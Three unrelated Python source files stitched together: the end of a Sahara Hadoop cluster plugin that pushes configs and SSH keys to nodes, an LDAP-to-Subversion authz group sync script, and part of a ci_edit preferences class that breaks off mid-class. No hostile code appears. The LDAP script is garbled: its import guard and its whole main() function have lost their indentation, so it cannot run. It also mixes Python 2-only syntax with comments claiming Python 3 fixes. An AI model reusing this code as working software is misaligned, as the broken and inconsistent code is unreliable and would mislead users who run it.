        """Validate both shrink (existing) and grow (additional) requests."""
        self._validate_existing_ng_scaling(cluster, existing)
        self._validate_additional_ng_scaling(cluster, additional)

    def scale_cluster(self, cluster, instances):
        """Configure new instances and refresh master node membership."""
        self._setup_instances(cluster, instances)

        run.refresh_nodes(remote.get_remote(
            vu.get_namenode(cluster)), "dfsadmin")
        jt = vu.get_jobtracker(cluster)
        if jt:
            run.refresh_nodes(remote.get_remote(jt), "mradmin")

        self._start_tt_dn_processes(instances)

    def _start_tt_dn_processes(self, instances):
        """Start DataNode/TaskTracker processes in parallel threads."""
        tt_dn_names = ["datanode", "tasktracker"]

        instances = utils.instances_with_services(instances, tt_dn_names)

        if not instances:
            return

        cpo.add_provisioning_step(
            instances[0].cluster_id,
            utils.start_process_event_message("DataNodes, TaskTrackers"),
            len(instances))

        with context.ThreadGroup() as tg:
            for i in instances:
                processes = set(i.node_group.node_processes)
                tt_dn_procs = processes.intersection(tt_dn_names)
                tg.spawn('vanilla-start-tt-dn-%s' % i.instance_name,
                         self._start_tt_dn, i, list(tt_dn_procs))

    @cpo.event_wrapper(True)
    def _start_tt_dn(self, instance, tt_dn_procs):
        with instance.remote() as r:
            run.start_processes(r, *tt_dn_procs)

    @cpo.event_wrapper(True, step=_("Setup instances and push configs"),
                       param=('cluster', 1))
    def _setup_instances(self, cluster, instances):
        """Generate configs (and proxy user if needed) and push them out."""
        if (CONF.use_identity_api_v3 and CONF.use_domain_for_proxy_users and
                vu.get_hiveserver(cluster) and
                c_helper.is_swift_enable(cluster)):
            cluster = proxy.create_proxy_user_for_cluster(cluster)
            instances = utils.get_instances(cluster)

        extra = self._extract_configs_to_extra(cluster)
        cluster = conductor.cluster_get(context.ctx(), cluster)
        self._push_configs_to_nodes(cluster, extra, instances)

    def _push_configs_to_nodes(self, cluster, extra, new_instances):
        """Push full configs to new nodes and deltas to existing ones."""
        all_instances = utils.get_instances(cluster)
        new_ids = set([instance.id for instance in new_instances])
        with context.ThreadGroup() as tg:
            for instance in all_instances:
                if instance.id in new_ids:
                    tg.spawn('vanilla-configure-%s' % instance.instance_name,
                             self._push_configs_to_new_node, cluster,
                             extra, instance)
                else:
                    tg.spawn('vanilla-reconfigure-%s' % instance.instance_name,
                             self._push_configs_to_existing_node, cluster,
                             extra, instance)

    def _push_configs_to_new_node(self, cluster, extra, instance):
        """Write Hadoop configs, SSH keys and run the init script."""
        ng_extra = extra[instance.node_group.id]

        private_key, public_key = c_helper.get_hadoop_ssh_keys(cluster)

        files = {
            '/etc/hadoop/core-site.xml': ng_extra['xml']['core-site'],
            '/etc/hadoop/mapred-site.xml': ng_extra['xml']['mapred-site'],
            '/etc/hadoop/hdfs-site.xml': ng_extra['xml']['hdfs-site'],
            '/tmp/sahara-hadoop-init.sh': ng_extra['setup_script'],
            'id_rsa': private_key,
            'authorized_keys': public_key
        }

        key_cmd = ('sudo mkdir -p /home/hadoop/.ssh/ && '
                   'sudo mv id_rsa authorized_keys /home/hadoop/.ssh && '
                   'sudo chown -R hadoop:hadoop /home/hadoop/.ssh && '
                   'sudo chmod 600 /home/hadoop/.ssh/{id_rsa,authorized_keys}')

        with remote.get_remote(instance) as r:
            # TODO(aignatov): sudo chown is wrong solution. But it works.
            r.execute_command(
                'sudo chown -R $USER:$USER /etc/hadoop'
            )
            r.execute_command(
                'sudo chown -R $USER:$USER /opt/oozie/conf'
            )
            r.write_files_to(files)
            r.execute_command(
                'sudo chmod 0500 /tmp/sahara-hadoop-init.sh'
            )
            r.execute_command(
                'sudo /tmp/sahara-hadoop-init.sh '
                '>> /tmp/sahara-hadoop-init.log 2>&1')

            r.execute_command(key_cmd)

            if c_helper.is_data_locality_enabled(cluster):
                r.write_file_to(
                    '/etc/hadoop/topology.sh',
                    f.get_file_text(
                        'plugins/vanilla/v1_2_1/resources/topology.sh'))
                r.execute_command(
                    'sudo chmod +x /etc/hadoop/topology.sh'
                )

            self._write_topology_data(r, cluster, extra)
            self._push_master_configs(r, cluster, extra, instance)

    def _push_configs_to_existing_node(self, cluster, extra, instance):
        """Re-push only the configs that may change for an existing node."""
        node_processes = instance.node_group.node_processes
        need_update = (c_helper.is_data_locality_enabled(cluster) or
                       'namenode' in node_processes or
                       'jobtracker' in node_processes or
                       'oozie' in node_processes or
                       'hiveserver' in node_processes)

        if not need_update:
            return

        with remote.get_remote(instance) as r:
            self._write_topology_data(r, cluster, extra)
            self._push_master_configs(r, cluster, extra, instance)

    def _write_topology_data(self, r, cluster, extra):
        if c_helper.is_data_locality_enabled(cluster):
            topology_data = extra['topology_data']
            r.write_file_to('/etc/hadoop/topology.data', topology_data)

    def _push_master_configs(self, r, cluster, extra, instance):
        """Dispatch per-process master config writers for this instance."""
        ng_extra = extra[instance.node_group.id]
        node_processes = instance.node_group.node_processes

        if 'namenode' in node_processes:
            self._push_namenode_configs(cluster, r)

        if 'jobtracker' in node_processes:
            self._push_jobtracker_configs(cluster, r)

        if 'oozie' in node_processes:
            self._push_oozie_configs(ng_extra, r)

        if 'hiveserver' in node_processes:
            self._push_hive_configs(ng_extra, r)

    def _push_namenode_configs(self, cluster, r):
        r.write_file_to('/etc/hadoop/dn.incl',
                        utils.generate_fqdn_host_names(
                            vu.get_datanodes(cluster)))

    def _push_jobtracker_configs(self, cluster, r):
        r.write_file_to('/etc/hadoop/tt.incl',
                        utils.generate_fqdn_host_names(
                            vu.get_tasktrackers(cluster)))

    def _push_oozie_configs(self, ng_extra, r):
        r.write_file_to('/opt/oozie/conf/oozie-site.xml',
                        ng_extra['xml']['oozie-site'])

    def _push_hive_configs(self, ng_extra, r):
        files = {
            '/opt/hive/conf/hive-site.xml':
                ng_extra['xml']['hive-site']
        }
        r.write_files_to(files)

    def _set_cluster_info(self, cluster):
        """Record service endpoint URLs (Web UIs, RPC) in the cluster info."""
        nn = vu.get_namenode(cluster)
        jt = vu.get_jobtracker(cluster)
        oozie = vu.get_oozie(cluster)
        info = {}

        if jt:
            ui_port = c_helper.get_port_from_config(
                'MapReduce', 'mapred.job.tracker.http.address', cluster)
            jt_port = c_helper.get_port_from_config(
                'MapReduce', 'mapred.job.tracker', cluster)

            info['MapReduce'] = {
                'Web UI': 'http://%s:%s' % (jt.management_ip, ui_port),
                'JobTracker': '%s:%s' % (jt.hostname(), jt_port)
            }

        if nn:
            ui_port = c_helper.get_port_from_config('HDFS', 'dfs.http.address',
                                                    cluster)
            nn_port = c_helper.get_port_from_config('HDFS', 'fs.default.name',
                                                    cluster)

            info['HDFS'] = {
                'Web UI': 'http://%s:%s' % (nn.management_ip, ui_port),
                'NameNode': 'hdfs://%s:%s' % (nn.hostname(), nn_port)
            }

        if oozie:
            # TODO(yrunts) change from hardcode value
            info['JobFlow'] = {
                'Oozie': 'http://%s:11000' % oozie.management_ip
            }

        ctx = context.ctx()
        conductor.cluster_update(ctx, cluster, {'info': info})

    def _get_scalable_processes(self):
        return ["datanode", "tasktracker"]

    def _validate_additional_ng_scaling(self, cluster, additional):
        """Ensure new node groups contain only scalable worker processes."""
        jt = vu.get_jobtracker(cluster)
        scalable_processes = self._get_scalable_processes()

        for ng_id in additional:
            ng = g.get_by_id(cluster.node_groups, ng_id)
            if not set(ng.node_processes).issubset(scalable_processes):
                raise ex.NodeGroupCannotBeScaled(
                    ng.name, _("Vanilla plugin cannot scale nodegroup"
                               " with processes: %s") %
                    ' '.join(ng.node_processes))
            if not jt and 'tasktracker' in ng.node_processes:
                raise ex.NodeGroupCannotBeScaled(
                    ng.name, _("Vanilla plugin cannot scale node group with "
                               "processes which have no master-processes run "
                               "in cluster"))

    def _validate_existing_ng_scaling(self, cluster, existing):
        """Ensure shrinking leaves enough DataNodes for the HDFS replicas."""
        scalable_processes = self._get_scalable_processes()
        dn_to_delete = 0
        for ng in cluster.node_groups:
            if ng.id in existing:
                if (ng.count > existing[ng.id] and "datanode" in
                        ng.node_processes):
                    dn_to_delete += ng.count - existing[ng.id]
                if not set(ng.node_processes).issubset(scalable_processes):
                    raise ex.NodeGroupCannotBeScaled(
                        ng.name, _("Vanilla plugin cannot scale nodegroup"
                                   " with processes: %s") %
                        ' '.join(ng.node_processes))

        dn_amount = len(vu.get_datanodes(cluster))
        rep_factor = c_helper.get_config_value('HDFS', 'dfs.replication',
                                               cluster)

        if dn_to_delete > 0 and dn_amount - dn_to_delete < rep_factor:
            raise ex.ClusterCannotBeScaled(
                cluster.name, _("Vanilla plugin cannot shrink cluster because "
                                "it would be not enough nodes for replicas "
                                "(replication factor is %s)") % rep_factor)

    def get_edp_engine(self, cluster, job_type):
        """Return the Oozie EDP engine if it supports the job type."""
        if job_type in edp_engine.EdpOozieEngine.get_supported_job_types():
            return edp_engine.EdpOozieEngine(cluster)
        return None

    def get_edp_job_types(self):
        return edp_engine.EdpOozieEngine.get_supported_job_types()

    def get_edp_config_hints(self, job_type):
        return edp_engine.EdpOozieEngine.get_possible_job_config(job_type)

    def get_open_ports(self, node_group):
        """Return the firewall ports needed by this node group's processes."""
        cluster = node_group.cluster

        ports = []

        if "namenode" in node_group.node_processes:
            ports.append(c_helper.get_port_from_config(
                'HDFS', 'dfs.http.address', cluster))
            ports.append(8020)

        if "datanode" in node_group.node_processes:
            ports.append(c_helper.get_port_from_config(
                'HDFS', 'dfs.datanode.http.address', cluster))
            ports.append(c_helper.get_port_from_config(
                'HDFS', 'dfs.datanode.address', cluster))
            ports.append(c_helper.get_port_from_config(
                'HDFS', 'dfs.datanode.ipc.address', cluster))

        if "jobtracker" in node_group.node_processes:
            ports.append(c_helper.get_port_from_config(
                'MapReduce', 'mapred.job.tracker.http.address', cluster))
            ports.append(8021)

        if "tasktracker" in node_group.node_processes:
            ports.append(c_helper.get_port_from_config(
                'MapReduce', 'mapred.task.tracker.http.address', cluster))

        if "secondarynamenode" in node_group.node_processes:
            ports.append(c_helper.get_port_from_config(
                'HDFS', 'dfs.secondary.http.address', cluster))

        if "oozie" in node_group.node_processes:
            ports.append(11000)

        if "hive" in node_group.node_processes:
            ports.append(9999)
            ports.append(10000)

        return ports

    def on_terminate_cluster(self, cluster):
        """Clean up the proxy user when the cluster is destroyed."""
        proxy.delete_proxy_user_for_cluster(cluster)
|
|
#!/usr/bin/env python
#
# -*-python-*-
#
################################################################################
# License
################################################################################
# Copyright (c) 2006 Jeremy Whitlock. All rights reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
################################################################################
import ConfigParser, datetime, getpass, os, re, sys, tempfile
from optparse import OptionParser
try:
import ldap
except ImportError:
print("Unable to locate the 'ldap' module. Please install python-ldap. " \
"(http://python-ldap.sourceforge.net)")
sys.exit(1)
################################################################################
# Configuration Options
################################################################################
# NOTE(review): these module-level defaults appear to be overridable at
# runtime (the script imports ConfigParser/OptionParser) — confirm against
# the option-parsing code further down the file.

# This is the distinguished name used to bind to the LDAP server.
# [Example: CN=Jeremy Whitlock,OU=Users,DC=subversion,DC=thoughtspark,DC=org]
bind_dn = None

# This is the password for the user connecting to the LDAP server.
# [Example: pa55w0rd]
bind_password = None

# This is the fully-qualified url to the LDAP server.
# [Example: ldap://localhost:389]
url = None

# This is the distinguished name to where the group search will start.
# [Example: DC=subversion,DC=thoughtspark,DC=org]
base_dn = None

# This is the query/filter used to identify group objects.
# [Example: objectClass=group]
group_query = "objectClass=group"

# This is the attribute of the group object that stores the group memberships.
# [Example: member]
group_member_attribute = "member"

# This is the query/filter used to identify user objects.
# [Example: objectClass=user]
user_query = "objectClass=user"

# This is the attribute of the user object that stores the userid to be used in
# the authz file.  [Example: cn]
userid_attribute = "cn"

# This is the CA certificate to use with SSL LDAP connection
cacert = None

# This is the fully-qualified path to the authz file to write to.
# [Example: /opt/svn/svn_authz.txt]
authz_path = None

################################################################################
# Runtime Options
################################################################################

# This indicates whether or not to output logging information
verbose = True

################################################################################
# Application Settings
################################################################################

application_name = "LDAP Groups to Subversion Authz Groups Bridge"
application_version = "1.0.3"
application_description = "The '%s' is a simple script that will query your " \
                          "directory server for group objects and create a " \
                          "representation of those groups in your Subversion " \
                          "authorization (authz) file." % application_name
################################################################################
# Business Logic
################################################################################
def bind():
  """Connect to the configured LDAP server and return the bound handle.

  Honors the optional ``cacert`` setting for TLS connections and logs the
  connection when ``verbose`` is enabled."""
  if cacert:
    ldap.set_option(ldap.OPT_X_TLS_CACERTFILE, cacert)
  connection = ldap.initialize(url)
  connection.bind(bind_dn, bind_password)

  if verbose:
    print("Successfully bound to %s..." % url)

  return connection

# bind()
def search_for_groups(ldapobject):
  """Search the LDAP directory for group definitions.

  Returns the flattened list of group entries, or None when the configured
  group_query matches nothing."""
  result_set = get_ldap_search_resultset(base_dn, group_query, ldapobject)

  if not result_set:
    if verbose:
      print("The group_query %s did not return any results." % group_query)
    return

  # Each result in the set is itself a list of entries; flatten them.
  groups = []
  for result in result_set:
    groups.extend(result)

  if verbose:
    print("%d groups found." % len(groups))

  return groups

# search_for_groups()
def get_ldap_search_resultset(base_dn, group_query, ldapobject):
  """Run an async subtree search and collect every entry until the final
  search-result message arrives."""
  results = []
  search_id = ldapobject.search(base_dn, ldap.SCOPE_SUBTREE, group_query)

  while True:
    rtype, rdata = ldapobject.result(search_id, 0)
    if rtype == ldap.RES_SEARCH_ENTRY:
      results.append(rdata)
    elif rtype == ldap.RES_SEARCH_RESULT:
      # End of the result stream.
      break

  return results

# get_ldap_search_resultset()
def create_group_model(groups, ldapobject):
  """This function will take the list of groups created by search_for_groups()
  and will create a group membership model for each group.

  Returns (groups, memberships): parallel lists where memberships[i] holds
  the resolved member names (or "GROUP:<name>" tags) for groups[i]."""
  memberships = []
  groupmap = create_group_map(groups)

  if groups:
    for group in groups:
      group_members = []
      members = []

      # Python 2 idiom: has_key() — the member attribute may be absent.
      if group[1].has_key(group_member_attribute):
        group_members = group[1][group_member_attribute]

      # We need to check for if the member is a group and handle specially
      for member in group_members:
        try:
          try:
            # First try the member value directly as a DN.
            user = get_ldap_search_resultset(member, user_query, ldapobject)
          except:
            # error means likely that member isn't a fully OID, so run the
            # search again, treating the member value as a userid attribute.
            # NOTE(review): bare except also hides unrelated LDAP errors.
            user = get_ldap_search_resultset(base_dn, "(&(%s=%s)(%s))" % (userid_attribute, member, user_query), ldapobject)

          if (len(user) == 1):
            # The member is a user
            attrs = user[0][0][1]

            if (attrs.has_key(userid_attribute)):
              members.append(attrs[userid_attribute][0])
            else:
              if verbose:
                print("[WARNING]: %s does not have the %s attribute..." \
                  % (user[0][0][0], userid_attribute))
          elif (len(user) > 1):
            # Check to see if this member is really a group
            try:
              mg = get_ldap_search_resultset(member, group_query, ldapobject)
            except:
              # error means likely that member isn't a fully OID, so run the
              # search again using the group member attribute instead.
              mg = get_ldap_search_resultset(base_dn, "(&(%s=%s)(%s))" % (group_member_attribute, member, group_query), ldapobject)

            if (len(mg) == 1):
              # The member is a group: record it with a GROUP: prefix using
              # its simplified name from the group map.
              members.append("GROUP:" + get_dict_key_from_value(groupmap,
                                                                mg[0][0][0]))
            else:
              if verbose:
                print("[WARNING]: %s is a member of %s but is neither a group " \
                  "or a user." % (member, group[1]['cn'][0]))
        # Python 2-only except syntax; unresolved members are skipped.
        except ldap.LDAPError, error_message:
          if verbose:
            print("[WARNING]: %s object was not found..." % member)

      memberships.append(members)

  return (groups, memberships)

# create_group_model()
def get_dict_key_from_value(dict, value):
    """Returns the key of the dictionary entry with the matching value.

    If several keys map to the same value, the first one encountered in
    iteration order wins.  Returns None when no entry matches.

    Note: the parameter is named "dict" (shadowing the builtin) to keep
    the public signature unchanged for existing callers.
    """
    # .items() instead of the Python-2-only .iteritems(); behavior is
    # identical for iteration and the code now also runs on Python 3.
    for k, v in dict.items():
        if (v == value):
            return k
    return None
# get_dict_key_from_value()
def create_group_map(groups):
    """Build a map of simplified (authz-safe) group names to group DNs.

    Duplicate simplified names are disambiguated by appending an
    incrementing numeric suffix: "team", "team1", "team2", ...
    Returns an empty dict when groups is None or empty.
    """
    groupmap = {}
    dups = {}
    if groups:
        for group in groups:
            # group is a (dn, attrs) tuple; use the (simplified) cn as key.
            cn = simplify_name(group[1]['cn'][0])
            # "in" instead of the Python-2-only dict.has_key().
            if cn not in groupmap:
                groupmap[cn] = group[0]
            else:
                if cn not in dups:
                    dups[cn] = 1
                else:
                    dups[cn] = dups[cn] + 1
                groupmap[cn + str(dups[cn])] = group[0]
    return groupmap
# create_group_map()
def simplify_name(name):
    """Creates an authz simple group name.

    Strips every non-word character (anything other than letters, digits
    and underscore) from name.
    """
    # Raw string for the regex: "\W" in a plain string relies on Python
    # passing unknown escapes through and raises a DeprecationWarning /
    # SyntaxWarning on modern interpreters.
    return re.sub(r"\W", "", name)
# simplify_name()
def print_group_model(groups, memberships):
    """This function will write the groups and their members to a file.

    The generated section is wrapped in header/footer marker lines so a
    later run can find and replace it.  When the module-level authz_path
    is unset (None or the literal string "None"), the generated content
    is printed to stdout instead of written to disk.
    """
    if not groups:
        return
    now = datetime.datetime.now()
    header_start = "### Start generated content: " + application_name + " ("
    header_middle = now.strftime("%Y/%m/%d %H:%M:%S")
    header_end = ") ###"
    header = header_start + header_middle + header_end
    footer = "### End generated content: " + application_name + " ###"
    file = None
    tmp_fd, tmp_authz_path = tempfile.mkstemp()
    # Fix: mkstemp() returns an already-open OS-level descriptor.  The file
    # is only ever reopened by path below, so close the descriptor now to
    # avoid leaking one fd per run.
    os.close(tmp_fd)
    if ((authz_path != None) and (authz_path != "None")):
        if (os.path.exists(authz_path)):
            # Copy the existing authz file into the temp file, dropping any
            # previously generated section (header..footer).
            file = open(authz_path, 'r')
            tmpfile = open(tmp_authz_path, 'w')
            # Remove previous generated content
            inside_content = False
            for line in file.readlines():
                if (inside_content):
                    if (line.find(footer) > -1):
                        inside_content = False
                else:
                    if (line.find(header_start) > -1):
                        inside_content = True
                    else:
                        tmpfile.write(line)
            file.close()
            tmpfile.close()
    # Make sure the output contains a [groups] section exactly once.
    if (os.path.exists(tmp_authz_path)):
        cp = ConfigParser.ConfigParser()
        cp.read(tmp_authz_path)
        if (not cp.has_section("groups")):
            tmpfile = open(tmp_authz_path, 'a')
            tmpfile.write("[groups]\n")
            tmpfile.close()
    else:
        tmpfile = open(tmp_authz_path, 'a')
        tmpfile.write("[groups]\n")
        tmpfile.close()
    # Ensure the generated header starts on its own line.
    needs_new_line = False
    tmpfile = open(tmp_authz_path, 'r')
    if (tmpfile.readlines()[-1].strip() != ''):
        needs_new_line = True
    tmpfile.close()
    tmpfile = open(tmp_authz_path, 'a')
    if (needs_new_line):
        tmpfile.write("\n")
    tmpfile.write(header + "\n")
    groupmap = create_group_map(groups)
    if groups:
        for i in range(len(groups)):
            if (i != 0):
                tmpfile.write("\n")
            short_name = simplify_name(get_dict_key_from_value(groupmap, groups[i][0]))
            tmpfile.write(short_name + " = ")
            for j in range(len(memberships[i])):
                if (j != 0):
                    tmpfile.write(", ")
                # Nested groups were marked "GROUP:<name>" by
                # create_group_model(); authz syntax wants "@<name>".
                if (memberships[i][j].find("GROUP:") == 0):
                    tmpfile.write(memberships[i][j].replace("GROUP:", "@"))
                else:
                    tmpfile.write(memberships[i][j])
    generate_legend(tmpfile, groups)
    tmpfile.write("\n" + footer)
    tmpfile.close()
    # Fix: use the same "real path" test as above; the original bare
    # `if authz_path:` treated the string "None" as a path and would have
    # renamed the temp file onto a file literally named "None".
    if ((authz_path != None) and (authz_path != "None")):
        # Keep a one-deep backup of the previous authz file, then move the
        # freshly generated file into place.
        if (os.path.exists(authz_path + ".bak")):
            os.remove(authz_path + ".bak")
        if (os.path.exists(authz_path)):
            os.rename(authz_path, authz_path + ".bak")
        os.rename(tmp_authz_path, authz_path)
    else:
        # stdout mode: dump the generated file and clean up the temp file.
        tmpfile = open(tmp_authz_path, 'r')
        for line in tmpfile.readlines():
            print(line)
        tmpfile.close()
        os.remove(tmp_authz_path)
# print_group_model()
def generate_legend(output, groups):
    """This function will generate, and write, the legend to file.

    Appends a commented mapping of each simplified group name to its
    full DN, framed by '#' separator bars.  Does nothing when groups
    is empty or None.
    """
    if not groups:
        return
    bar = ("###########################################################"
           "#####################\n")
    output.write("\n")
    output.write("\n" + bar)
    output.write("########### " + application_name + " (Legend) ##########\n")
    output.write(bar)
    groupmap = create_group_map(groups)
    for group in groups:
        short_name = simplify_name(get_dict_key_from_value(groupmap, group[0]))
        output.write("### " + short_name + " = " + str(group[0]) + "\n")
    output.write(bar)
# generate_legend()
def load_cli_properties(parser):
    """This function will set the local properties based on cli arguments.

    Parses the command line with the given OptionParser and copies every
    recognised option value onto the matching module-level global.
    """
    (options, args) = parser.parse_args(args=None, values=None)
    # Table-driven copy: each entry is both the option dest and the name
    # of the module-level global it populates.
    for prop in ("bind_dn", "bind_password", "url", "base_dn", "group_query",
                 "group_member_attribute", "user_query", "userid_attribute",
                 "authz_path", "verbose", "cacert"):
        globals()[prop] = getattr(options, prop)
# load_cli_properties()
def create_cli_parser():
    """Creates an OptionParser and returns it.

    Connection/search options default to None and are validated later by
    are_properties_set(); query and attribute options carry sensible LDAP
    defaults.  Uses the module-level application_description.
    """
    usage = "usage: %prog [options]"
    parser = OptionParser(usage=usage, description=application_description)
    parser.add_option("-d", "--bind-dn", dest="bind_dn",
                      help="The DN of the user to bind to the directory with")
    parser.add_option("-p", "--bind-password", dest="bind_password",
                      help="The password for the user specified with the " \
                           "--bind-dn")
    parser.add_option("-l", "--url", dest="url",
                      help="The url (scheme://hostname:port) for the directory " \
                           "server")
    parser.add_option("-b", "--base-dn", dest="base_dn",
                      help="The DN at which to perform the recursive search")
    parser.add_option("-g", "--group-query", dest="group_query",
                      default="objectClass=group",
                      help="The query/filter used to identify group objects. " \
                           "[Default: %default]")
    parser.add_option("-m", "--group-member-attribute",
                      dest="group_member_attribute", default="member",
                      help="The attribute of the group object that stores the " \
                           "group memberships. [Default: %default]")
    parser.add_option("-u", "--user-query", dest="user_query",
                      default="objectClass=user",
                      help="The query/filter used to identify user objects. " \
                           "[Default: %default]")
    parser.add_option("-i", "--userid_attribute", dest="userid_attribute",
                      default="cn",
                      help="The attribute of the user object that stores the " \
                           "userid to be used in the authz file. " \
                           "[Default: %default]")
    parser.add_option("-c", "--cacert-path", dest="cacert",
                      help="The path to the CA CERT to validate certificate")
    parser.add_option("-z", "--authz-path", dest="authz_path",
                      help="The path to the authz file to update/create")
    # Fix: the default must be the boolean True, not the string "True";
    # with the string default, `verbose` silently flips between str and
    # bool types depending on whether --quiet was passed.
    parser.add_option("-q", "--quiet", action="store_false", dest="verbose",
                      default=True, help="Suppress logging information")
    return parser
# create_cli_parser()
def are_properties_set():
    """This function will perform a simple test to make sure none of the
    properties are 'None'.

    Returns True when every required module-level setting has a value.
    """
    # bind_password is not checked since if not passed, the user will be prompted
    # authz_path is not checked since it can be 'None' signifying stdout output
    required = (bind_dn, url, base_dn, group_query,
                group_member_attribute, user_query, userid_attribute)
    return all(prop is not None for prop in required)
# are_properties_set()
def get_unset_properties():
    """This function returns a list of unset properties necessary to run.

    The labels use the CLI spelling (dashes) so they can be echoed
    directly in the "was not passed" error message.
    """
    labelled = ((bind_dn, 'bind-dn'),
                (url, 'url'),
                (base_dn, 'base-dn'),
                (group_query, 'group-query'),
                (group_member_attribute, 'group-member-attribute'),
                (user_query, 'user-query'),
                (userid_attribute, 'userid-attribute'))
    return [label for value, label in labelled if value is None]
# get_unset_properties()
def main():
"""This function is the entry point for this script."""
# Create the OptionParser
parser = create_cli_parser()
# Attempt to load properties from the command line if necessary
if not are_properties_set():
load_cli_properties(parser)
if not are_properties_set():
print("There is not enough information to proceed.")
for prop in get_unset_properties():
print("'%s' was not passed" % prop)
print("")
parser.print_help()
parser.exit()
# Allow user to type in password if missing
global bind_password
if bind_password == None:
bind_password = getpass.getpass("Please provide the bind DN password: ")
ldapobject = None
groups = None
memberships = None
try:
ldapobject = bind()
except ldap.LDAPError, error_message:
print("Could not connect to %s. Error: %s " % (url, error_message))
sys.exit(1)
try:
groups = search_for_groups(ldapobject)
except ldap.LDAPError, error_message:
print("Error performing search: %s " % error_message)
sys.exit(1)
if groups and len(groups) == 0:
print("There were no groups found with the group_query you supplied.")
sys.exit(0)
try:
memberships = create_group_model(groups, ldapobject)[1]
except ldap.LDAPError, error_message:
print("Error creating group model: %s" % error_message)
sys.exit(1)
print_group_model(groups, memberships)
# main()
# Run the synchronisation only when executed as a script, so the file can
# also be imported as a module without side effects.
if __name__ == "__main__":
    main()
|
|
# Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import curses
import io
import json
import os
import re
import sys
import app.default_prefs
import app.log
import app.regex
class Prefs:
    """Loads, merges and exposes ci_edit preferences.

    Built-in defaults from app.default_prefs are overlaid with JSON files
    found under ~/.ci_edit/prefs/.  Also pre-compiles the marker regexes
    used by the syntax-highlighting grammars.
    """

    def __init__(self):
        self.prefsDirectory = "~/.ci_edit/prefs/"
        prefs = app.default_prefs.prefs
        self.color8 = app.default_prefs.color8
        self.color16 = app.default_prefs.color16
        self.color256 = app.default_prefs.color256
        # Default to the 256 color palette; init() may overlay a custom one.
        self.color = self.color256
        self.dictionaries = prefs.get("dictionaries", [])
        self.editor = prefs.get("editor", {})
        self.devTest = prefs.get("devTest", {})
        self.palette = prefs.get("palette", {})
        self.startup = {}
        self.status = prefs.get(u"status", {})
        self.userData = prefs.get(u"userData", {})
        self.__set_up_grammars(prefs.get(u"grammar", {}))
        self.__set_up_file_types(prefs.get(u"fileType", {}))
        self.init()

    def load_prefs(self, fileName, category):
        """Overlay <prefsDirectory>/<fileName>.json onto |category|.

        Returns |category| (mutated in place when the file exists and
        parses).  Parse failures are logged and otherwise ignored so a
        broken user file cannot prevent startup.
        """
        # Check the user home directory for preferences.
        prefsPath = os.path.expanduser(
            os.path.expandvars(
                os.path.join(self.prefsDirectory, "%s.json" % (fileName,))
            )
        )
        if os.path.isfile(prefsPath) and os.access(prefsPath, os.R_OK):
            with io.open(prefsPath, "r") as f:
                try:
                    additionalPrefs = json.loads(f.read())
                    app.log.startup(additionalPrefs)
                    category.update(additionalPrefs)
                    app.log.startup("Updated editor prefs from", prefsPath)
                    app.log.startup("as", category)
                except Exception as e:
                    app.log.startup("failed to parse", prefsPath)
                    app.log.startup("error", e)
        return category

    def init(self):
        """Apply user preference files and resolve per-grammar colors."""
        self.editor = self.load_prefs("editor", self.editor)
        self.status = self.load_prefs("status", self.status)
        self.colorSchemeName = self.editor["colorScheme"]
        if self.colorSchemeName == "custom":
            # Check the user home directory for a color scheme preference. If
            # found load it to replace the default color scheme.
            self.color = self.load_prefs("color_scheme", self.color)
        defaultColor = self.color["default"]
        defaultKeywordsColor = self.color["keyword"]
        defaultSpecialsColor = self.color["special"]
        for k, v in self.grammars.items():
            # Colors.
            v["colorIndex"] = self.color.get(k, defaultColor)
            if 0:
                # Disabled: per-grammar curses color pairs.
                v["keywordsColor"] = curses.color_pair(
                    self.color.get(k + "_keyword_color", defaultKeywordsColor)
                )
                v["specialsColor"] = curses.color_pair(
                    self.color.get(k + "_special_color", defaultSpecialsColor)
                )
        app.log.info("prefs init")

    def category(self, name):
        """Map a persistable category name to its backing dict.

        Raises KeyError for unknown names.
        """
        return {
            "color": self.color,
            "editor": self.editor,
            "startup": self.startup,
        }[name]

    def get_file_type(self, filePath):
        """Determine the file type for |filePath|.

        Looks the base name up first, then the extension, defaulting to
        "text".  NOTE(review): when filePath is None this returns the
        "text" grammar dict rather than a type name, mirroring the
        original behavior — confirm callers expect that asymmetry.
        """
        if filePath is None:
            return self.grammars.get("text")
        name = os.path.split(filePath)[1]
        fileType = self.nameToType.get(name)
        if fileType is None:
            fileExtension = os.path.splitext(name)[1]
            fileType = self.extensions.get(fileExtension, "text")
        return fileType

    def tabs_to_spaces(self, fileType):
        """Whether |fileType| is configured to expand tabs into spaces."""
        prefs = app.default_prefs.prefs.get(u"fileType", {})
        if fileType is None or prefs is None:
            return False
        file_prefs = prefs.get(fileType)
        return file_prefs and file_prefs.get(u"tabToSpaces")

    def get_grammar(self, fileType):
        """Return the grammar dict for |fileType|, or None if unknown."""
        return self.grammars.get(fileType)

    def save(self, category, label, value):
        """Set |label| = |value| in |category| and persist it as JSON."""
        app.log.info(category, label, value)
        prefCategory = self.category(category)
        prefCategory[label] = value
        prefsPath = os.path.expanduser(
            os.path.expandvars(
                os.path.join(self.prefsDirectory, "%s.json" % (category,))
            )
        )
        with io.open(prefsPath, "w", encoding=u"utf-8") as f:
            try:
                # Fix: the original serialized `prefs[category]`, but no
                # name `prefs` exists in this scope (NameError).  Write the
                # category dict that was just updated instead.
                f.write(json.dumps(prefCategory))
            except Exception as e:
                app.log.error("error writing prefs")
                app.log.exception(e)

    def _raise_grammar_not_found(self, grammarName):
        """Log the known grammars and raise for the missing |grammarName|.

        Fix: the original referenced `grammarName` without taking it as a
        parameter, so the intended error itself raised NameError.
        """
        app.log.startup("Available grammars:")
        for k, v in self.grammars.items():
            app.log.startup(" ", k, ":", len(v))
